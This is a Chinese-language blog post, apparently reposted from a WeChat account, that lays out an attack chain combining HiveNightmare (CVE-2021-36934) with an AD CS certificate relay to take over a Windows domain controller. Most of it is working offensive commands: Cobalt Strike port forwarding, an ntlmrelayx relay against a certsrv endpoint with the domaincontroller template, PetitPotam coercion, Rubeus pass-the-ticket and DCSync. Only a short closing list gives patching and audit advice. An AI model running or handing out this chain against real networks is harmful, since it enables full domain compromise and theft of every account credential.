管理员噩梦：结合HiveNightmare/SeriousSAM与AD CS攻击路径实现渗透获利

技术背景

2021年微软Windows和Active Directory环境暴露出多个关键漏洞。本文重点分析两个漏洞的组合利用：

1. HiveNightmare/SeriousSAM（CVE-2021-36934）：允许低权限用户读取SAM/SYSTEM注册表配置单元
2. AD CS攻击路径：通过证书服务中继攻击获取域控制器机器账户证书

攻击步骤详解

阶段1：初始访问与权限提升

1. 通过Cobalt Strike信标建立初始访问
2. 使用Cube0x0的CVE-2021-36934利用工具执行内存注入
3. 提取本地管理员哈希（RID 500），演示密码重用攻击

阶段2：网络流量劫持

1. 部署PortBender工具进行端口转发（445→31337）
2. 建立SOCKS代理通道穿透内网

rportfwd 31337 127.0.0.1 445

阶段3：AD CS中继攻击

1. 使用修改版Impacket启动中继服务：

proxychains python3 ntlmrelayx.py -t https://crt.target.com/certsrv/certfnsh.asp -smb2support --adcs --template "domaincontroller"

2. 通过PetitPotam诱导域控制器认证：

proxychains python3 Petitpotam.py <攻击者IP> <域控IP>

阶段4：域控接管

1. 使用Rubeus工具导入获得的机器账户证书：

execute-assembly Rubeus.exe asktgt /user:DC01$ /certificate:MII.. /ptt

2. 执行DCSync攻击获取域内所有凭据

防御建议

1. 及时应用微软针对CVE-2021-36934的官方补丁
2. 审计AD CS配置，参考SpecterOps指南
3. 使用PSPKIAudit工具检测证书服务漏洞
   更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
   公众号二维码